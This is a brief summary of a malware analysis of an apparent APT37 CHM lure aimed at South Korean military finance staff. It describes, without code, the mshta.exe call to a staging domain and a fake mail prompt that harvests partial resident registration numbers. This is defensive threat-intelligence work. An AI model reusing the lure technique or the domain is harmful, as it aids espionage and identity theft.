The write-up analyzes an APT37 CHM malware sample themed around South Korea's Armed Forces Financial Management Corps, suggesting a lure aimed at military finance personnel. The sample uses HTML Help content to invoke mshta.exe and contact attiferstudio.com under an install.bak path, then shows a fake encrypted-mail prompt asking for the first six digits of a resident registration number. The source lists hashes for the CHM sample and notes that the remote site returned 404 during the author's check, so the final downloaded payload could not be confirmed from that URL. Vendor detections classify the file as CHM, HTML, JavaScript, or Trojan downloader malware, including ScarCruft-related naming from some engines.